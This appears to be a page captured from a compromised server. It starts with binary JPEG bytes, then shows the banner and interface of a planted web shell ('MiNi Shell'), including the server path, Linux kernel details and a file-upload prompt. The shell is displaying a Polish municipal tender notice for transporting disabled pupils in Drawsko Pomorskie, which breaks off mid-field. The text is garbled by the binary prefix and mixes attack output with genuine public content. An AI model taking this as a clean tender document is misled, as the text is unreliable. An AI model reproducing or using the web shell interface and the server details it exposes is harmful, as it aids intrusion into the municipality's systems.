JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20221213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20221213/0049229301-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz i odwóz uczniów niepełnosprawnych z terenu gminy Drawsko Pomorskie do przedszkoli, szkół i placówek zapewniających odpowiednią formę kształcenia w okresie od 02.01.2023r. do 30.06.2023r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Drawsko Pomorskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330920742</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">gen. W. Sikorskiego 41</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Drawsko Pomorskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">drawsko@drawsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.drawsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz i odwóz uczniów niepełnosprawnych z terenu gminy Drawsko Pomorskie do przedszkoli, szkół i placówek zapewniających odpowiednią formę kształcenia w okresie od 02.01.2023r. do 30.06.2023r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-236b99a0-7aca-11ed-94da-6ae0fe5e7159</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00492293</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00027665/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Dowóz i odwóz uczniów niepełnosprawnych z terenu gminy Drawsko Pomorskie do przedszkoli, szkół i placówek zapewniających odpowiednią formę kształcenia w okresie od 02.01.2023r. do 30.06.2023r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami odbywa się przy użyciu następujących narzędzi: miniPortalu, który dostępny jest pod adresem:<br/>https://miniportal.uzp.gov.pl/; ePUAPu dostępnego pod adresem: https://epuap.gov.pl/wps/portal/ nazwa adresata: Urząd Miejski w<br/>Drawsku Pomorskim Identyfikator adresata: /umdrawsko/SkrytkaESP; poczty elektronicznej: p.wisniewski@drawsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu (<br/>https://miniportal.uzp.gov.pl ) oraz w Regulaminie ePUAP.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularz do komunikacji” wynosi 150 MB.<br/>Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>Identyfikator postępowania dla danego postępowania o udzielenie zamówienia dostępny jest na liście wszystkich postępowań na<br/>miniPortalu oraz stanowi załącznik nr 10 do niniejszej SWZ.<br/>Zamawiający przekazuje link do postępowania oraz ID postępowania w załączniku nr 10 do niniejszej SWZ. Dane postępowanie<br/>można wyszukać również na Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony<br/>głównej z zakładki Postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w Rozdz. 41 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w Rozdz. 41 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IR.271.16.2022.PW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz i odwóz uczniów do placówki w Gudowie.<br/>Podstawą do ułożenia tras przewozu są dane dotyczące: liczby przewożonych osób, ściśle określonej trasy przewozu,<br/>Przewóz powinien odbywać się najkrótszą możliwą trasą.<br/>Dowożenie i odwożenie dzieci odbywać się będzie według zaproponowanego przez Wykonawcę i zatwierdzonego przez<br/>Zamawiającego rozkładu jazdy.<br/>Dzieci winny być dowożone do placówek nie wcześniej niż o 7:30 i nie później niż na godzinę 8:00, a odwożone do domów o<br/>godzinie nie później niż o 15:00 w dni nauki szkolnej.<br/>Dokładne oznaczenie przedziałów czasowych i przystanków w jakich powinien być wykonany dowóz dzieci do placówki oraz<br/>ich odwiezienie po zakończeniu zajęć ustalane będzie pomiędzy Wykonawcą a Zamawiającym.<br/>Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas przebywania uczniów w podróży był jak najkrótszy,<br/>co oznacza nie więcej niż 60 minut, a nadto winien uwzględniać to, aby przewożeni uczniowie mogli punktualnie rozpocząć<br/>zajęcia lekcyjne bez zbędnego oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego<br/>oczekiwania. <br/>Rozkład jazdy winien być opracowany tak, aby dzienna trasa przewozu była najkrótsza w danym dniu. Rozkład jazdy nie<br/>może przekraczać ilość kilometrów przedstawionych w załączniku nr 11 do SWZ.<br/>Wykonawca zobowiązany jest ustalić dni dowozu i odwozu uczniów oraz dni<br/>wolne od zajęć z dyrektorami poszczególnych placówek.<br/>Wykaz miejscowości oraz liczba uczniów z poszczególnych miejscowości został przedstawiony w załączniku nr 11 do SWZ.<br/>Zamawiający zastrzega sobie prawo zmiany tras i ilości kilometrów w trakcie realizacji zamówienia przy zachowaniu<br/>obowiązującej stawki za kilometr.<br/>Zamawiający dopuszcza możliwość zmiany ilości dowożonych dzieci. W przypadku zwiększenia ilości dowożonych dzieci<br/>Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie.<br/>Wykonawca zobowiązuje się do świadczenia usług przewozowych - ze względu na przewóz dzieci niepełnosprawnych -<br/>wyjątkowo starannie i bezpiecznie, łącznie z roztoczeniem opieki nad dziećmi w czasie całego przejazdu oraz wsiadania i<br/>wysiadania dzieci z pojazdu.<br/>Wykonawca zobowiązuje się do zapewnienia opieki wszystkim dzieciom w czasie świadczenia usługi, poprzez zatrudnienie<br/>opiekuna czuwającego nad bezpieczeństwem dzieci podczas przewozu, wsiadania i wysiadania z pojazdu, przechodzenia<br/>przez jezdnię do pojazdu i z pojazdu. Funkcji opiekuna nie może pełnić kierowca autobusu.<br/>Pojazdy, którymi będzie świadczona usługa powinny być dostosowane do potrzeb osób niepełnosprawnych, w tym do<br/>przewozu dzieci na wózkach inwalidzkich, posiadać w szczególności klimatyzację, ogrzewanie, przesłony przeciwsłoneczne<br/>na szybach, pasy bezpieczeństwa oraz foteliki, zimą oczyszczone z lodu i śniegu stopnie. Należy zapewnić miejsca<br/>siedzące dla wszystkich uczniów.<br/>Pojazdy służące do przewozu dzieci muszą być przeznaczone do tego celu i dostosowanie do liczby przewożonych dzieci.<br/>Wyklucza się łączenie przewozów dzieci z innymi osobami (np. przewozy liniowe).<br/>Przewozy dzieci odbywać się mogą wyłącznie środkami transportu przystosowanymi do przewozu dzieci niepełnosprawnych<br/>tj. dodatkowe wewnętrzne zabezpieczenia, zapewniające bezpieczny transport, dostosowane do indywidulanych potrzeb<br/>każdego dowożonego dziecka.<br/>Pojazdy muszą posiadać polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa<br/>badania techniczne dla pojazdów oraz przez cały okres realizacji zamówienia aktualną licencję, pozwolenia, zezwolenia,<br/>certyfikaty, wymagane przepisami prawa i niezbędne do prawidłowej realizacji usługi.<br/>Pojazdy służące do przewozu dzieci muszą być nie starsze niż 15 lat.<br/>W przypadku braku możliwości wykonania usługi, Wykonawca własnym staraniem i na własny koszt zapewni pojazd<br/>zastępczy odpowiadający przepisom prawa oraz zapisami zawartej umowy.<br/>W przypadku niezapewnienia przez Wykonawcę środków transportu, o których mowa w ust. 1 pkt 1.20., Zamawiający zleci<br/>wykonanie tej usługi innemu przewoźnikowi, obciążając kosztami Wykonawcę.<br/>Cena winna być ustalona za 1 km przewozu dzieci.<br/>Ustalone wynagrodzenie brutto za km przewozu obejmuje wszystkie koszty<br/>niezbędne do prawidłowej realizacji zadania, w szczególności dowożenia i odwożenie dzieci, zapewnienie im opieki, koszty<br/>ubezpieczenia pojazdu, podatki.<br/>Wynagrodzenie za 1 km nie ulegnie zmianie przez cały okres obowiązywania<br/>umowy.<br/>Zamawiający finansuje jedynie przewóz dzieci od pierwszej do ostatniej miejscowości, wymienionymi w załączniku nr 11 do<br/>SWZ. Zamawiający nie pokrywa dojazdu autobusów z bazy i na bazę Wykonawcy.<br/>Wykonawca zapozna się z miejscem świadczenia usługi, a warunki atmosferyczne i stan techniczny dróg nie będą<br/>podstawą do domagania się zmiany wynagrodzenia.<br/>Kierowcy muszą posiadać wszystkie wymagane przepisami prawa badania i uprawnienia. Kierowcy wyposażeni są w<br/>identyfikatory oraz telefony komórkowe.<br/>Wykonawca zapewni opiekuna, którego zadaniem jest nadzór nad uczniami w czasie dowozu, udzielania czynnej pomocy<br/>dzieciom w czasie wsiadania, zajmowania miejsc i przy wysiadaniu oraz przekazanie uczniów rodzicom, pracownikom<br/>przedszkola, szkoły lub placówki, dopilnowanie aby każde dziecko było zapięte, pasem bezpieczeństwa w czasie transportu,<br/>opiekunem nie może być kierowca. Opiekunowie przekazują uczniów uprawnionym osobom (w miejscu<br/>wsiadania/wysiadania – rodzicom albo upoważnionym przez nich osobom, w placówce oświatowej – upoważnionym<br/>pracownikom placówki). Opiekun zostanie zatrudniony przez Wykonawcę w ramach ceny za usługę. Opiekun nad dziećmi w<br/>czasie przewozu sprawuje co najmniej jeden opiekun w każdym z pojazdów. Za właściwe sprawowanie opieki nad dziećmi<br/>podczas przewozów jest odpowiedzialny Wykonawca i ponosi on całkowitą odpowiedzialność za szkodę związaną z<br/>uszczerbkiem na zdrowiu lub życiu przewożonych dzieci, podczas podróży, po wyjściu przez nich z pojazdu oraz przed<br/>odjazdem pojazdu.<br/>Wykonawca ponosi całkowitą odpowiedzialność za szkody, które wynikają z ruchu pojazdów i przewozu dzieci przy<br/>uwzględnieniu zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium czas podstawienia pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz i odwóz uczniów do placówki w Radowie Wielkim.<br/>Podstawą do ułożenia tras przewozu są dane dotyczące: liczby przewożonych osób, ściśle określonej trasy przewozu,Przewóz powinien odbywać się najkrótszą możliwą trasą.<br/>Dowożenie i odwożenie dzieci odbywać się będzie według zaproponowanego przez Wykonawcę i zatwierdzonego przez<br/>Zamawiającego rozkładu jazdy.<br/>Dzieci winny być dowożone do placówek nie wcześniej niż o 7:30 i nie później niż na godzinę 8:00, a odwożone do domów o<br/>godzinie nie później niż o 15:00 w dni nauki szkolnej.<br/>Dokładne oznaczenie przedziałów czasowych i przystanków w jakich powinien być wykonany dowóz dzieci do placówki oraz<br/>ich odwiezienie po zakończeniu zajęć ustalane będzie pomiędzy Wykonawcą a Zamawiającym.<br/>Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas przebywania uczniów w podróży był jak najkrótszy,<br/>co oznacza nie więcej niż 60 minut, a nadto winien uwzględniać to, aby przewożeni uczniowie mogli punktualnie rozpocząć<br/>zajęcia lekcyjne bez zbędnego oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego<br/>oczekiwania.<br/>Rozkład jazdy winien być opracowany tak, aby dzienna trasa przewozu była najkrótsza w danym dniu. Rozkład jazdy nie<br/>może przekraczać ilość kilometrów przedstawionych w załączniku nr 11 do SWZ.<br/>Wykonawca zobowiązany jest ustalić dni dowozu i odwozu uczniów oraz dni<br/>wolne od zajęć z dyrektorami poszczególnych placówek.<br/>Wykaz miejscowości oraz liczba uczniów z poszczególnych miejscowości został przedstawiony w załączniku nr 11 do SWZ.<br/>Zamawiający zastrzega sobie prawo zmiany tras i ilości kilometrów w trakcie realizacji zamówienia przy zachowaniu obowiązującej stawki za kilometr.<br/>Zamawiający dopuszcza możliwość zmiany ilości dowożonych dzieci. W przypadku zwiększenia ilości dowożonych dzieci<br/>Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie.<br/>Wykonawca zobowiązuje się do świadczenia usług przewozowych - ze względu na przewóz dzieci niepełnosprawnych - wyjątkowo starannie i bezpiecznie, łącznie z roztoczeniem opieki nad dziećmi w czasie całego przejazdu oraz wsiadania i wysiadania dzieci z pojazdu.<br/>Wykonawca zobowiązuje się do zapewnienia opieki wszystkim dzieciom w czasie świadczenia usługi, poprzez zatrudnienie<br/>opiekuna czuwającego nad bezpieczeństwem dzieci podczas przewozu, wsiadania i wysiadania z pojazdu, przechodzenia<br/>przez jezdnię do pojazdu i z pojazdu. Funkcji opiekuna nie może pełnić kierowca autobusu.<br/>Pojazdy, którymi będzie świadczona usługa powinny być dostosowane do potrzeb osób niepełnosprawnych, w tym do<br/>przewozu dzieci na wózkach inwalidzkich, posiadać w szczególności klimatyzację, ogrzewanie, przesłony przeciwsłoneczne<br/>na szybach, pasy bezpieczeństwa oraz foteliki, zimą oczyszczone z lodu i śniegu stopnie. Należy zapewnić miejsca<br/>siedzące dla wszystkich uczniów.<br/>Pojazdy służące do przewozu dzieci muszą być przeznaczone do tego celu i dostosowanie do liczby przewożonych dzieci.<br/>Wyklucza się łączenie przewozów dzieci z innymi osobami (np. przewozy liniowe).<br/>Przewozy dzieci odbywać się mogą wyłącznie środkami transportu przystosowanymi do przewozu dzieci niepełnosprawnych<br/>tj. dodatkowe wewnętrzne zabezpieczenia, zapewniające bezpieczny transport, dostosowane do indywidulanych potrzeb<br/>każdego dowożonego dziecka.<br/>Pojazdy muszą posiadać polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa<br/>badania techniczne dla pojazdów oraz przez cały okres realizacji zamówienia aktualną licencję, pozwolenia, zezwolenia,<br/>certyfikaty, wymagane przepisami prawa i niezbędne do prawidłowej realizacji usługi.<br/>Pojazdy służące do przewozu dzieci muszą być nie starsze niż 15 lat.<br/>W przypadku braku możliwości wykonania usługi, Wykonawca własnym staraniem i na własny koszt zapewni pojazd<br/>zastępczy odpowiadający przepisom prawa oraz zapisami zawartej umowy.<br/>W przypadku niezapewnienia przez Wykonawcę środków transportu, o których mowa w ust. 1 pkt 1.20., Zamawiający zleci<br/>wykonanie tej usługi innemu przewoźnikowi, obciążając kosztami Wykonawcę.<br/>Cena winna być ustalona za 1 km przewozu dzieci.<br/>Ustalone wynagrodzenie brutto za km przewozu obejmuje wszystkie koszty<br/>niezbędne do prawidłowej realizacji zadania, w szczególności dowożenia i odwożenie dzieci, zapewnienie im opieki, koszty<br/>ubezpieczenia pojazdu, podatki.<br/>Wynagrodzenie za 1 km nie ulegnie zmianie przez cały okres obowiązywania<br/>umowy.<br/>Zamawiający finansuje jedynie przewóz dzieci od pierwszej do ostatniej miejscowości, wymienionymi w załączniku nr 11 do<br/>SWZ. Zamawiający nie pokrywa dojazdu autobusów z bazy i na bazę Wykonawcy.<br/>Wykonawca zapozna się z miejscem świadczenia usługi, a warunki atmosferyczne i stan techniczny dróg nie będą<br/>podstawą do domagania się zmiany wynagrodzenia.<br/>Kierowcy muszą posiadać wszystkie wymagane przepisami prawa badania i uprawnienia. Kierowcy wyposażeni są w<br/>identyfikatory oraz telefony komórkowe.<br/>Wykonawca zapewni opiekuna, którego zadaniem jest nadzór nad uczniami w czasie dowozu, udzielania czynnej pomocy<br/>dzieciom w czasie wsiadania, zajmowania miejsc i przy wysiadaniu oraz przekazanie uczniów rodzicom, pracownikom<br/>przedszkola, szkoły lub placówki, dopilnowanie aby każde dziecko było zapięte, pasem bezpieczeństwa w czasie transportu,<br/>opiekunem nie może być kierowca. Opiekunowie przekazują uczniów uprawnionym osobom (w miejscu<br/>wsiadania/wysiadania – rodzicom albo upoważnionym przez nich osobom, w placówce oświatowej – upoważnionym<br/>pracownikom placówki). Opiekun zostanie zatrudniony przez Wykonawcę w ramach ceny za usługę. Opiekun nad dziećmi w<br/>czasie przewozu sprawuje co najmniej jeden opiekun w każdym z pojazdów. Za właściwe sprawowanie opieki nad dziećmi<br/>podczas przewozów jest odpowiedzialny Wykonawca i ponosi on całkowitą odpowiedzialność za szkodę związaną z<br/>uszczerbkiem na zdrowiu lub życiu przewożonych dzieci, podczas podróży, po wyjściu przez nich z pojazdu oraz przed<br/>odjazdem pojazdu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 